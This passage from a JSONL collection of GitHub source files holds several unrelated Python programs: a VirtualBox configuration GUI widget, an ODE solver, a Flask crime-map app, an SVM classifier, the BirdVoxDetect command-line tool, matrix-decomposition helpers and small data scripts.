sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.memory_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.combo_value_memory.grid(\n row=1,\n column=1,\n sticky=self.sticky_entry,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self._show_memory_slider_value(self.memory_slider.get())\n\n def _render_disk_size_subframe_elements(self):\n self.disk_size_subframe.columnconfigure(0, weight=1)\n self.disk_size_subframe.columnconfigure(1, weight=0)\n self.disk_size_subframe.rowconfigure(0, weight=1)\n self.disk_size_subframe.rowconfigure(1, weight=1)\n self.disk_size_subframe.rowconfigure(2, weight=1)\n self.disk_label.grid(\n row=0,\n column=0,\n sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.disk_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.disk_entry.grid(\n row=1,\n column=1,\n padx=self.padx_std,\n pady=self.pady_entry,\n sticky=self.sticky_entry\n )\n self.disk_slider_label.grid(\n row=2,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self.slider_memory_label.grid(\n row=2,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self._show_disk_size_value(self.disk_slider_value.get())\n\n def _vbox_name_check(self, event):\n vbox_name_typed = self.vbox_name_entry.get()\n if vbox_name_typed not in self.vbox_list:\n self.vbox_name_entry.configure(border_color=[\"#979DA2\", \"#565B5E\"])\n self.warning_label_vbox.configure(\n text='',\n )\n if vbox_name_typed in self.vbox_list:\n self.vbox_name_entry.configure(border_color='red')\n self.warning_label_vbox.configure(\n text='A virtualbox with this name already exists',\n text_color='red'\n )\n\n def _show_cpus_slider_value(self, cpus_value):\n if cpus_value:\n self.cpus_slider_label.configure(\n font=self.font_std,\n text=f'CPUs Selected: {int(cpus_value)}'\n )\n\n def _show_memory_slider_value(self, memory_value):\n if memory_value:\n self.slider_memory_label.configure(\n font=self.font_std,\n text=f'Selected Value: {int(self.memory_var.get())} MB'\n )\n\n def _show_memory_value_with_keyrelease(self, event):\n self._show_memory_slider_value(self.memory_var.get())\n\n def _show_disk_size_value(self, disk_value):\n if disk_value:\n value_text = f'{self.disk_slider_value.get()} MB'\n if self.disk_slider_value.get() >= 1024:\n disk_value = self.disk_slider_value.get() / 1_024\n value_text = f'{disk_value:.2f} GB'\n if disk_value >= 1024:\n disk_value = self.disk_slider_value.get() / 1_048_576\n value_text = f'{disk_value:.2f} TB'\n self.disk_slider_label.configure(\n font=self.font_std,\n text=f'Disk Size: {value_text}'\n )\n\n def _set_disk_size_entry(self, event):\n self.disk_entry.delete(0, 100)\n self.disk_entry.insert(0, self.disk_slider_value.get())\n\n def _show_disk_size_value_with_keyrelease(self, event):\n self.disk_slider_value.set(int(self.disk_entry.get()))\n self._show_disk_size_value(int(self.disk_entry.get()))\n","repo_name":"shonc23/vmbuilder","sub_path":"app/gui/widgets/vboxconfigswidget.py","file_name":"vboxconfigswidget.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18705680277","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nclass ODEsolver():\n\tdef __init__(self, t0, tf, delta, x0, y0,functions):\n\t\tself.x = [x0]\n\t\tself.y = 
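# --- Editor's annotation (not part of the dataset record above) ---
# Hedged usage sketch for VboxConfigsWidget above. The "configurations" keys
# mirror the ones the widget reads; the window wiring is illustrative, and the
# widget's __init__ shells out to VBoxManage, so VirtualBox must be installed.
import customtkinter as ctk

configs = {
    "configurations": {
        "vbox_name": {"default": ""},
        "cpus": {"default": 2},
        "memory": {"default": 4096},
        "disk_size": {"default": 30},
    }
}
root = ctk.CTk()
VboxConfigsWidget(root, configs).pack(fill="both", expand=True)
root.mainloop()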
[y0]\n\t\tself.functions = functions\n\t\tself.f = functions[0]\n\t\tself.g = functions[1]\n\t\tself.tvals = [t0,tf]\n\t\tself.delta = delta\n\t\tself.n = int(((tf-t0)/delta)) + 1\n\tdef solve(self):\n\t\tfor i in range(1,self.n):\n\t\t\tself.x = np.append(self.x , self.delta*(self.f(self.x[i-1],self.y[i-1])) + self.x[i-1])\n\t\t\tself.y = np.append(self.y , self.delta*(self.g(self.x[i-1],self.y[i-1])) + self.y[i-1])\n\t\treturn self.x, self.y\n\ndef f(x,y):\n\treturn 1 - 4*x + (y*x*x)\ndef g(x,y,):\n\treturn (3*x) - (y*x*x)\n\t\nfunctions = [f,g]\n\node1 = ODEsolver(0.0,500.0,.01,1.5,3.0,functions)\nx,y = ode1.solve()\ntvals = np.linspace(0,500,50001)\nplt.figure(1)\nplt.subplot(121)\nplt.xlabel(\"t\")\nplt.ylabel(\"x(t) blue, y(t) red\")\nplt.plot(tvals,x, color = 'b')\nplt.plot(tvals,y, color = 'r')\n\nplt.subplot(122)\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.plot(x,y)\nplt.show()","repo_name":"notabelardoriojas/FSU-Projects-and-Assignments","sub_path":"2019 - Programming for Scientific Applications (Python)/08_Solving ODEs/riojaslab6.py","file_name":"riojaslab6.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74049924328","text":"#!/usr/bin/env python\n\nfrom dbhelper import DBHelper\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nfrom flask import flash, redirect, url_for\nimport traceback\nimport dbconfig\nimport json\nimport dateparser\nimport datetime\nimport string\n\nif dbconfig.test:\n from mockdbhelper import MockDBHelper as DBHelper\nelse:\n from dbhelper import DBHelper\n\napp = Flask(__name__)\nDB = DBHelper()\n\ncategories = [\"mugging\", \"break-in\"]\n\n@app.route(\"/\")\ndef home(error_message=None):\n crimes = []\n try:\n crimes = DB.get_all_crimes()\n crimes = json.dumps(crimes)\n except Exception as e:\n print(traceback.format_exc())\n return render_template(\"home.html\", crimes=crimes, categories=categories\n , error_message=error_message)\n\n\n@app.route(\"/add\",methods=[\"POST\"])\ndef add():\n try:\n data = request.form.get(\"userinput\")\n DB.add_input(data)\n except Exception as e:\n print(traceback.format_exc())\n return home()\n\n@app.route(\"/clear\")\ndef clear():\n try:\n DB.clear_all()\n except Exception as e:\n print(traceback.format_exc())\n return home()\n\n@app.route(\"/submitcrime\",methods=[\"POST\"])\ndef submitcrime():\n category = request.form.get(\"category\")\n if category not in categories:\n flash(\"%s not in categories:%s\" %(category, categories))\n return redirect(url_for(\"home\"))\n date = request.form.get(\"date\")\n if not date:\n return home(\"Invaild date. 
please use yyyy-mm-dd format\")\n try:\n latitude = float(request.form.get(\"latitude\"))\n longitude = float(request.form.get(\"longitude\"))\n except ValueError:\n flash(traceback.format_exc())\n return redirect(url_for(\"home\"))\n description = request.form.get(\"description\")\n description = sanitize_string(description)\n DB.add_crime(category,date,latitude,longitude,description)\n return home()\n\n\n@app.route(\"/cookies\")\ndef cookies():\n cookies_str = \";\".join([str(x)+\"=\"+str(y) for x,y in request.cookies.items()])\n return cookies_str\n\n\n@app.route(\"/ip\")\ndef ip():\n return jsonify({\"ip\": request.remote_addr}),200\n\n\ndef format_date(userdata):\n date = dateparser.parse(userdata)\n try:\n return datetime.datetime.strftime(date, \"%Y-%m-%d\")\n except TypeError:\n return None\n\n\ndef sanitize_string(userinput):\n whitelist = string.ascii_letters + string.digits + \" !?$.,;-'&\"\"\"\n return filter(lambda x: x in whitelist, userinput)\n\nif __name__ == \"__main__\":\n app.run(port=5000,debug=True)\n","repo_name":"gufengxiaoyuehan/crimemap","sub_path":"crimemap.py","file_name":"crimemap.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12927350463","text":"import numpy as np\nimport pandas\n#from subprocess import check_call\n#import seaborn as sns \n#from matplotlib import pyplot as plt \n# from sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support\nfrom sklearn.svm import SVC\n#from sklearn.model_selection import GridSearchCV\nfrom confusion_mat import conf_matrix\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\n\ndef svm(X_train, y_train, X_test, y_test):\n\n # X_train['Sex'],_ = pandas.factorize(X_train['Sex'])\n # X_train['Sport'],_ = pandas.factorize(X_train['Sport'])\n # X_train['NOC'],_ = pandas.factorize(X_train['NOC'])\n # X_train['Host_Country'],_=pandas.factorize(X_train['Host_Country'])\n # y_train['Medal'],_ = pandas.factorize(y_train['Medal'])\n # X_test['Sex'],_ = pandas.factorize(X_test['Sex'])\n # X_test['Sport'],_ = pandas.factorize(X_test['Sport'])\n # X_test['NOC'],_ = pandas.factorize(X_test['NOC'])\n # y_test['Medal'],_ = pandas.factorize(y_test['Medal'])\n # X_test['Host_Country'],_=pandas.factorize(X_test['Host_Country'])\n # params = grid_search(X_train, y_train.values.ravel())\n svclassification(X_train, y_train.values.ravel(), X_test, y_test.values.ravel())\n'''\ndef grid_search(X_train, Y_train):\n print(\"3\")\n parameters = {'kernel':('linear', 'rbf','poly', 'sigmoid'),\n 'C':[1, 5, 10, 50, 100],\n 'gamma':['scale',0.25, .5], 'degree':[1, 2, 4]}\n print(\"4\")\n svc = SVC()\n print(\"5\")\n clf = GridSearchCV(svc, parameters)\n print(\"6\")\n clf.fit(X_train[:100], Y_train[:100])\n print(\"7\")\n print(clf.best_params_)\n print(\"end\")\n return clf.best_params_['kernel']\n'''\ndef svclassification(X_train, y_train, X_test, y_test):\n params = ['linear']#, 'rbf']\n accuracy_dict = {}\n for param in params:\n clf = SVC(kernel = param, class_weight='balanced', probability=True)\n clf.fit(X_train, y_train)\n predict = clf.predict(X_test)\n accuracy = accuracy_score(y_test, predict) * 100\n accuracy_dict[param] = accuracy\n print('\\nAccuracy: ', accuracy)\n precision, recall, fscore, support = precision_recall_fscore_support(y_test, predict, average = 'micro')\n print('\\nPrecision: ', precision, '\\nRecall: ', recall, '\\nF-score: ', 
fscore)\n conf_matrix(y_test,predict)\n # max_accuracy = max([accuracy_dict[param] for param in accuracy_dict])\n # #print(\"\\n max accuracy: \",max_accuracy, \" for kernel: \",str(param for param in accuracy_dict if accuracy_dict[param] == max_accuracy))\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n n_class = y_test.shape\n print(list(n_class)[0],y_test,predict)\n for i in range(list(n_class)[0]):\n fpr[i], tpr[i], _ = roc_curve(y_test, predict)\n roc_auc[i] = auc(fpr[i], tpr[i])\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), predict.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n plt.figure()\n lw = 2\n plt.plot(fpr[2], tpr[2], color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic example')\n plt.legend(loc=\"lower right\")\n plt.show()\n","repo_name":"adityajoshi2k7/Analysing-Olympics-Medal-Tally","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4886136150","text":"from __future__ import print_function\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter, ArgumentTypeError\nfrom collections.abc import Iterable\nimport logging\nimport numpy as np\nimport os\nfrom six import string_types\nimport sys\n\nimport birdvoxdetect\nfrom birdvoxdetect.birdvoxdetect_exceptions import BirdVoxDetectError\n\n# The following line circumvent issue #1715 in xgboost\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"True\"\n\n\ndef get_file_list(input_list):\n \"\"\"Parse list of input paths.\"\"\"\n if not isinstance(input_list, Iterable) or isinstance(input_list, string_types):\n raise ArgumentTypeError(\"input_list must be a non-string iterable\")\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n file_list.append(os.path.abspath(item))\n elif os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise BirdVoxDetectError(\"Could not find input at path {}\".format(item))\n\n return file_list\n\n\ndef run(\n inputs,\n output_dir=None,\n export_clips=False,\n export_confidence=False,\n export_faults=False,\n export_logger=False,\n predict_proba=False,\n threshold=50.0,\n suffix=\"\",\n clip_duration=1.0,\n logger_level=logging.INFO,\n):\n verbose = True\n if isinstance(inputs, string_types):\n file_list = [inputs]\n elif isinstance(inputs, Iterable):\n file_list = get_file_list(inputs)\n else:\n raise BirdVoxDetectError(\"Invalid input: {}\".format(str(inputs)))\n\n if len(file_list) == 0:\n print(\"birdvoxdetect: No WAV files found in {}. 
Aborting.\".format(str(inputs)))\n sys.exit(-1)\n\n # Print header\n if verbose:\n if threshold:\n print(\"birdvoxdetect: Threshold = {:4.1f}\".format(threshold))\n\n if output_dir:\n print(\"birdvoxdetect: Output directory = \" + output_dir)\n\n if not suffix == \"\":\n print(\"birdvoxdetect: Suffix string = \" + suffix)\n\n if export_clips:\n export_clips_str = \"\".join(\n [\n \"Duration of exported clips = \",\n \"{:.2f} seconds.\".format(clip_duration),\n ]\n )\n print(\"birdvoxdetect: \" + export_clips_str)\n\n # Process all files in the arguments\n for filepath in file_list:\n if verbose:\n print(\"birdvoxdetect: Processing: {}\".format(filepath))\n birdvoxdetect.process_file(\n filepath,\n clip_duration=clip_duration,\n export_clips=export_clips,\n export_confidence=export_confidence,\n export_faults=export_faults,\n export_logger=export_logger,\n logger_level=logger_level,\n output_dir=output_dir,\n predict_proba=predict_proba,\n suffix=suffix,\n threshold=threshold,\n )\n if verbose:\n print(\"birdvoxdetect: Done.\")\n\n\ndef parse_args(args):\n parser = ArgumentParser(\n sys.argv[0],\n description=main.__doc__,\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser.add_argument(\n \"inputs\",\n nargs=\"*\",\n help=\"Path or paths to files to process, or path to \"\n \"a directory of files to process.\",\n )\n\n parser.add_argument(\n \"--output-dir\",\n \"-o\",\n default=None,\n help=\"Directory to save the output file(s); \"\n \"The default value is the same directory as the input \"\n \"file(s).\",\n )\n\n parser.add_argument(\n \"--export-clips\",\n \"-c\",\n action=\"store_true\",\n help=\"Export detected events as audio clips in WAV format.\",\n )\n\n parser.add_argument(\n \"--export-confidence\",\n \"-C\",\n action=\"store_true\",\n help=\"Export the time series of model confidence values of events\"\n \"in HDF5 format.\",\n )\n\n parser.add_argument(\n \"--export-faults\",\n \"-f\",\n action=\"store_true\",\n help=\"Export list of sensor faults in CSV format.\",\n )\n\n parser.add_argument(\n \"--export-logger\",\n \"-l\",\n action=\"store_true\",\n help=\"Export output of Python logger in TXT format.\",\n )\n\n parser.add_argument(\n \"--threshold\",\n \"-t\",\n type=valid_threshold,\n default=50,\n help=\"Detection threshold, between 10 and 90. \"\n \"The default value is 50. \"\n \"Greater values lead to higher precision at the expense \"\n \"of a lower recall.\",\n )\n\n parser.add_argument(\n \"--suffix\",\n \"-s\",\n default=\"\",\n help=\"String to append to the output filenames.\"\n \"The default value is the empty string.\",\n )\n\n parser.add_argument(\n \"--clip-duration\",\n \"-d\",\n type=positive_float,\n default=None,\n help=\"Duration of the exported clips, expressed in seconds (fps). \"\n \"The default value is 1.0, that is, one second. 
\"\n \"We recommend values of 0.5 or above.\",\n )\n\n parser.add_argument(\n \"--predict-proba\",\n \"-p\",\n action=\"store_true\",\n help=\"Export output probabilities as a JSON container.\",\n )\n\n parser.add_argument(\n \"--quiet\", \"-q\", action=\"store_true\", help=\"Print less messages on screen.\"\n )\n\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"Print timestamps of detected events.\",\n )\n\n parser.add_argument(\n \"--version\", \"-V\", action=\"store_true\", help=\"Print version number.\"\n )\n\n if args == []:\n parser.print_help(sys.stdout)\n return \"\"\n\n args = parser.parse_args(args)\n\n if args.quiet and args.verbose:\n raise BirdVoxDetectError(\n \"Command-line flags --quiet (-q) and --verbose (-v) \"\n \"are mutually exclusive.\"\n )\n\n if args.clip_duration is None:\n args.clip_duration = 1.0\n elif not args.export_clips:\n raise BirdVoxDetectError(\n \"The --export-clips (-c) flag should be present \"\n \"if the --clip-duration (-d) flag is present.\"\n )\n\n return args\n\n\ndef main():\n \"\"\"\n Extracts nocturnal flight calls from audio by means of the BirdVoxDetect\n deep learning model (Lostanlen et al. 2019).\n \"\"\"\n args = parse_args(sys.argv[1:])\n\n if args == \"\":\n return\n\n if args.version:\n print(birdvoxdetect.version.version)\n return\n\n if args.quiet:\n logger_level = 30\n elif args.verbose:\n logger_level = 10\n else:\n logger_level = 25\n\n run(\n args.inputs,\n output_dir=args.output_dir,\n export_clips=args.export_clips,\n export_confidence=args.export_confidence,\n export_faults=args.export_faults,\n export_logger=args.export_logger,\n predict_proba=args.predict_proba,\n threshold=args.threshold,\n suffix=args.suffix,\n clip_duration=args.clip_duration,\n logger_level=logger_level,\n )\n\n\ndef positive_float(value):\n \"\"\"An argparse-like method for accepting only positive number\"\"\"\n try:\n fvalue = float(value)\n except (ValueError, TypeError) as e:\n raise ArgumentTypeError(\n \"Expected a positive float, error message: {}\".format(e)\n )\n if np.isnan(fvalue) or fvalue <= 0:\n raise ArgumentTypeError(\"Expected a positive number\")\n return fvalue\n\n\ndef valid_threshold(value):\n \"\"\"An argparse-like method for accepting only floats between 0 and 100\"\"\"\n try:\n fvalue = float(value)\n except (ValueError, TypeError) as e:\n raise ArgumentTypeError(\n \"Expected a positive float, error message: {}\".format(e)\n )\n if np.isnan(fvalue) or fvalue < 0 or fvalue > 100:\n raise ArgumentTypeError(\"Expected a number between 0 and 100\")\n return fvalue\n","repo_name":"BirdVox/birdvoxdetect","sub_path":"birdvoxdetect/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"5582835352","text":"from __future__ import annotations\nimport abc\nimport hashlib\nfrom enum import IntEnum\nfrom events import Events # type: ignore\nfrom neo3.core import types\n\n\nmsgrouter = Events()\n\n# :noindex:\n\n\nclass Size(IntEnum):\n \"\"\"\n Explicit bytes of memory consumed\n \"\"\"\n uint8 = 1\n uint16 = 2\n uint32 = 4\n uint64 = 8\n uint160 = 20\n uint256 = 32\n\n\nclass IJson(abc.ABC):\n @abc.abstractmethod\n def to_json(self) -> dict:\n \"\"\" convert object into json \"\"\"\n\n @classmethod\n @abc.abstractmethod\n def from_json(cls, json: dict):\n \"\"\" create object from JSON \"\"\"\n\n\ndef to_script_hash(data: bytes) -> types.UInt160:\n \"\"\"\n Create a script hash 
based on the input data.\n\n    Args:\n        data: data to hash\n    \"\"\"\n    intermediate_data = hashlib.sha256(data).digest()\n    data_ = hashlib.new('ripemd160', intermediate_data).digest()\n    return types.UInt160(data_)\n","repo_name":"KunJon-analytics/AfricaN3","sub_path":"neo3/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37610693620","text":"import os\nimport requests\nimport traceback\n\npodjetja_directory = 'podatki'\n\ndef download_url_to_string(url):\n    try:\n        page_content = requests.get(url)\n        if page_content.status_code == 200:\n            return page_content.text\n        else:\n            raise ValueError(f\"Unexpected status code: {page_content.status_code}\")\n    except Exception:\n        print(f\"The following error occurred:\\n{traceback.format_exc()}\")\n\ndef save_string_to_file(text, directory, filename):\n    os.makedirs(directory, exist_ok=True)\n    path = os.path.join(directory, filename)\n    with open(path, 'w', encoding='utf-8') as file_out:\n        file_out.write(text)\n    return None\n\ndef save_frontpage(page, directory, filename):\n    html_strani = download_url_to_string(page)\n    save_string_to_file(html_strani, directory, filename)\n\ndef url(index):\n    return 'https://www.value.today/world-top-1000-companies-as-on-dec-25-2022?title=&field_headquarters_of_company_target_id=All&field_company_category_primary_target_id&field_market_cap_dec_25_2022__value=&page={}'.format(index)\ndef name(index):\n    return 'podjetja{}'.format(index)\n\nfor i in range(0,20):\n    save_frontpage(url(i), podjetja_directory, name(i)) \n\ndef read_file_to_string(directory, filename):\n    path = os.path.join(directory, filename)\n    with open(path, 'r', encoding='utf-8') as f:\n        return f.read()\n    \n\n\n\n\n\n\n\n\n","repo_name":"AnzeKriznar/Projektna-naloga","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31967130066","text":"from sklearn.manifold import TSNE\nfrom sklearn.datasets import load_iris,load_digits\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport random\n\ndef load_data_and_draw(use_sample=False):\n    \"\"\"\n    @Param use_sample: whether to sample the O class\n    \"\"\"\n    path = \"prototype_9.npy\"\n    digits = np.load(path, allow_pickle=True)[()]\n    data, target = [], []\n    color_dict = {0: \"r\", 1: \"k\", 2: \"b\", 3: \"g\", 4: \"m\",\n                  5: \"c\", 6: \"#ccc\", 7: \"#22cc88\", 8: \"orange\", 9: \"brown\", 10: \"pink\"}\n    origin_data = digits[\"data\"].tolist()\n    data_len = len(digits[\"data\"])\n    origin_target = digits[\"target\"][-data_len:].tolist()\n    print(data_len)\n    print(len(target))\n    for ei, i in enumerate(origin_target):\n        if i != -1:\n            draw = True\n            if use_sample and i == 0:\n                if random.random() >= 0.7:\n                    draw = False\n            if draw:\n                # print(i)\n                target.append(color_dict[i])\n                data.append(origin_data[ei])\n    print(target)\n    X_tsne = TSNE(n_components=2, random_state=33).fit_transform(data)\n    # X_pca = PCA(n_components=2).fit_transform(digits.data)\n\n    ckpt_dir = \"images\"\n    if not os.path.exists(ckpt_dir):\n        os.makedirs(ckpt_dir)\n    plt.figure(figsize=(5, 5))\n    plt.title(\"{}[use_sample={}]\".format(path, str(use_sample)))\n    # plt.subplot(121)\n    plt.scatter(X_tsne[:, 0], X_tsne[:, 1], s=[8] * len(target), c=target, label=\"t-SNE\", cmap=\"Oranges\")\n    plt.legend()\n    # plt.subplot(122)\n    # plt.scatter(X_pca[:, 0], X_pca[:, 
1], c=digits[\"target\"], label=\"PCA\")\n # plt.legend()\n plt.savefig(\"images/inter-5-1.png\", dpi=120)\n plt.show()\n\n\nif __name__ == \"__main__\":\n load_data_and_draw(False)\n # digits = load_digits()\n # X_tsne = TSNE(n_components=2,random_state=33).fit_transform(digits.data)\n # X_pca = PCA(n_components=2).fit_transform(digits.data)\n #\n # ckpt_dir=\"images\"\n # if not os.path.exists(ckpt_dir):\n # os.makedirs(ckpt_dir)\n #\n # plt.figure(figsize=(10, 5))\n # plt.subplot(121)\n # plt.scatter(X_tsne[:, 0], X_tsne[:, 1], c=digits.target,label=\"t-SNE\")\n # plt.legend()\n # plt.subplot(122)\n # plt.scatter(X_pca[:, 0], X_pca[:, 1], c=digits.target,label=\"PCA\")\n # plt.legend()\n # plt.savefig(\"images/inter-5-1.png\", dpi=120)\n # plt.show()\n","repo_name":"HugAILab/HugNLP","sub_path":"processors/ner/fewshot_ner/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"33190222067","text":"\"\"\"Tools for matrix decomposition and power.\"\"\"\nimport numpy as np\n\n\ndef eigh(matrix, threshold=1e-9):\n \"\"\"Return the eigenvalues and eigenvectors of a Hermitian matrix.\n\n Eigenvalues whose absolute values are less than the threshold are discarded as well as the\n corresponding eigenvectors.\n\n Parameters\n ----------\n matrix : np.ndarray(N, N)\n Square Hermitian matrix.\n threshold : {1e-9, float}\n Eigenvalues (and corresponding eigenvectors) below this threshold are discarded.\n\n Returns\n -------\n eigval : np.ndarray(K,)\n Eigenvalues sorted in decreasing order.\n eigvec : np.ndarray(N,K)\n Matrix where the columns are the corresponding eigenvectors to the eigval.\n\n Raises\n ------\n TypeError\n If `matrix` is not a two-dimensional numpy array.\n If `threshold` is not an integer or a float.\n ValueError\n If `matrix` is not a square matrix.\n If `matrix` is not Hermitian.\n If `threshold` is negative.\n\n Warns\n -----\n If there are any negative eigenvalues (beyond the given threshold).\n If any eigenvalues and eigenvectors are discarded.\n\n Note\n ----\n This code mainly uses numpy.eigh\n\n \"\"\"\n if not (isinstance(matrix, np.ndarray) and matrix.ndim == 2):\n raise TypeError(\"Given matrix must be a two-dimensional numpy array.\")\n if matrix.shape[0] != matrix.shape[1]:\n raise ValueError(\"Given matrix must be square.\")\n if not np.allclose(matrix.conjugate().T, matrix):\n raise ValueError(\"Given matrix must be Hermitian.\")\n if not isinstance(threshold, (int, float)):\n raise TypeError(\"Given threshold must be an integer or a float.\")\n if threshold < 0:\n raise ValueError(\"Given threshold must be positive.\")\n\n eigval, eigvec = np.linalg.eigh(matrix)\n # NOTE: it is assumed that the np.linalg.eigh sorts the eigenvalues in increasing order.\n\n neg_indices = eigval < -threshold\n if np.any(neg_indices):\n print((\n \"WARNING: {0} eigenvalues are negative (less than the threshold {1}):\\n\"\n \"{2}\".format(np.sum(neg_indices), -threshold, eigval[neg_indices])\n ))\n\n kept_indices = np.abs(eigval) > threshold\n if np.sum(~kept_indices) > 0:\n print((\n \"WARNING: Discarded {0} eigenvalues because they are less than the threshold {1}:\\n\"\n \"{2}\".format(np.sum(~kept_indices), threshold, eigval[~kept_indices])\n ))\n\n eigval, eigvec = eigval[kept_indices], eigvec[:, kept_indices]\n return eigval[::-1], eigvec[:, ::-1]\n\n\ndef svd(matrix, threshold=1e-9):\n \"\"\"Return the singular values and singular vectors of the given 
matrix.\n\n Singular values whose absolute values are less than the threshold are discarded as well as the\n corresponding singular vectors.\n\n\n Parameters\n ----------\n matrix : np.ndarray(N, M)\n Matrix.\n threshold : {1e-9, float}\n Singular values (and corresponding singular vectors) below this threshold are discarded.\n\n Returns\n -------\n u : np.ndarray(N, K)\n Left singular matrix.\n sigma : np.ndarray(K,)\n Singular values sorted in decreasing order.\n vdagger : np.ndarray(K, M)\n Right singular matrix.\n\n Raises\n ------\n TypeError\n If `matrix` is not a two-dimensional numpy array.\n\n Warns\n -----\n If any singular values and singular vectors are discarded.\n\n Note\n ----\n This code uses numpy.linalg.svd\n\n \"\"\"\n # pylint: disable=C0103\n if not (isinstance(matrix, np.ndarray) and matrix.ndim == 2):\n raise TypeError(\"Given matrix must be a two-dimensional numpy array.\")\n\n u, sigma, vdagger = np.linalg.svd(matrix, full_matrices=False)\n # NOTE: it is assumed that the np.linalg.svd sorts the singular values in descending order.\n\n kept_indices = sigma > threshold\n if np.sum(~kept_indices) > 0:\n print((\n \"WARNING: Discarded {0} singular values because they are less than the threshold {1}:\\n\"\n \"{2}\".format(np.sum(~kept_indices), threshold, sigma[~kept_indices])\n ))\n\n u, sigma, vdagger = u[:, kept_indices], sigma[kept_indices], vdagger[kept_indices, :]\n\n return u, sigma, vdagger\n\n\ndef power_symmetric(matrix, k, threshold=1e-9):\n \"\"\"Return the kth power of the given symmetric matrix.\n\n Parameters\n ----------\n matrix : np.ndarray(N, N)\n Symmetric matrix.\n k : {int, float}\n Power of the matrix.\n threshold : {1e-9, float}\n In the eigenvalue decomposition, the eigenvalues (and corresponding eigenvectors) that are\n less than the threshold are discarded.\n\n Returns\n -------\n matrix_power : np.ndarray(N, N)\n Matrix raised to the kth power.\n\n Raises\n ------\n ValueError\n If the `k` is a fraction and matrix has negative eigenvalues.\n\n \"\"\"\n eigval, eigvec = eigh(matrix, threshold=threshold)\n if k % 1 != 0 and np.any(eigval < 0):\n raise ValueError(\n \"Given matrix has negative eigenvalues. 
Fractional powers of negative eigenvalues are \"\n \"not supported.\"\n )\n return (eigvec * (eigval ** k)).dot(eigvec.T)\n","repo_name":"theochem/chemtools","sub_path":"chemtools/orbstools/orthogonalization.py","file_name":"orthogonalization.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"17592803133","text":"# Luisa Timothy 10-02-2018\r\n# Collaz conjecture \r\n\r\nn = 1984\r\n\r\nwhile n !=1: # as long as n is not 1\r\n if n % 2 == 0: # if n modulus 2 exactly equals 0, meaning if n is an even number, divide by two\r\n n = n // 2 # then n is n divided by two returning an integer, not a floating point\r\n print (n) # output result\r\n else: # if n is not even then multiply by three and add 1\r\n n = n * 3 + 1 # n is n times 3 plus 1\r\n print (n) # output result\r\n\r\nprint (\"the final value of n is\", n) # final result will always be 1","repo_name":"Luisa-T/helloworld","sub_path":"CollatzLuTi.py","file_name":"CollatzLuTi.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9342209880","text":"\"\"\"\nThis allows you to run a specific test function by itself from an importable module.\n\nThe function can be either a method of a unittest.TestCase subclass, or just a function defined\nat module level. This is useful when running an individual test under mpirun for debugging\npurposes.\n\nTo specify the test to run, use the following forms:\n\n:. OR :\n\nwhere is either the dotted module name or the full filesystem path of the python file.\n\nfor example:\n\n mpirun -n 4 run_test mypackage.mysubpackage.mymod:MyTestCase.test_foo\n\n OR\n\n mpirun -n 4 run_test 